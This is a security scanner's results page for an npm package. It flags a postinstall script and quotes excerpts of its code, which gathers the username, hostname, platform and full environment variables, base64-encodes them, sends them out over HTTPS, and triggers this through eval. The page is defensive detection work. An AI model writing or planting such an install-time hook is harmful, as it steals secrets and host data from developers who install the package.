Static Scan Results
scanned 4h ago · by rust-scannerStatic analysis flagged 7 finding(s) at 72.0% confidence. This version is warn-only unless an AI or security-team review confirms malicious behavior.
Static reason
One or more suspicious static signals were detected.
Decision evidence
public snapshotBehavioral surface
EnvironmentVarsEvalNetwork
Source & flagged code
4 flagged · loading sourcepackage.jsonView file
•scripts.postinstall = node ./scripts/postinstall.js
High
Install Time Lifecycle Scripts
Package defines install-time lifecycle scripts.
package.jsonView on unpkg•scripts.postinstall = node ./scripts/postinstall.js
Medium
Ambiguous Install Lifecycle Script
Install-time lifecycle script is not statically allowlisted and needs review.
package.jsonView on unpkgscripts/postinstall.jsView file
2L3: const https = require('https');
L4:
...
L6: return {
L7: user: os.userInfo().username,
L8: host: os.hostname(),
L9: platform: process.platform,
L10: env: process.env,
L11: };
...
L14: function play(data) {
L15: const encoded = Buffer.from(JSON.stringify(data)).toString('base64');
L16: const req = https.request({
High
Host Fingerprint Exfiltration
Source collects local host identity data and sends it to an external endpoint.
scripts/postinstall.jsView on unpkg · L225try {
L26: eval('play(food())');
L27: } catch (e) {
Low
Eval
Package source references a known benign dynamic code generation pattern.
scripts/postinstall.jsView on unpkg · L25Findings
2 High3 Medium2 Low
HighInstall Time Lifecycle Scriptspackage.json
HighHost Fingerprint Exfiltrationscripts/postinstall.js
MediumAmbiguous Install Lifecycle Scriptpackage.json
MediumNetwork
MediumEnvironment Vars
LowScripts Present
LowEvalscripts/postinstall.js